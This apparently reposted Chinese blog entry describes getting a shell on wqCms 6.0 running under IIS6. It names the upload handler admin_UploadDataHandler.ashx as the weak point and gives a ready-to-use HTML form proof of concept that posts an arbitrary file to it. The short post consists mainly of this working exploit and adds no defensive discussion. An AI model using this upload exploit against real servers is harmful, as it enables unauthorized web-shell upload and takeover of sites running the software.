分类 标签 存档 黑客派 订阅 搜索

wqCms6.0 在 IIS6 的 Getshell

58 浏览

2017-02-15 发布

一、漏洞利用点

漏洞文件: admin_UploadDataHandler.ashx 自定义构造上传点

二、hack it

77e968abd5e5cb3e2c4cdfbe620568fa.jpg
7281e4d1334393ddcc1c4926ad0065a8.jpg

三、POC

<html>
    <body>
        <form action="http://127.0.0.1/admin_UploadDataHandler.ashx" method="POST"enctype="multipart/form-data">
            <input  type="file" name="uploadify" />
            <input  type="text" name="saveFile" value="admin" />
            <input type="submit" name="Upload" value="Submit Query" />
        </form>
    </body>
</html>

转自群友论坛文章wobushou

评论  
留下你的脚步
推荐阅读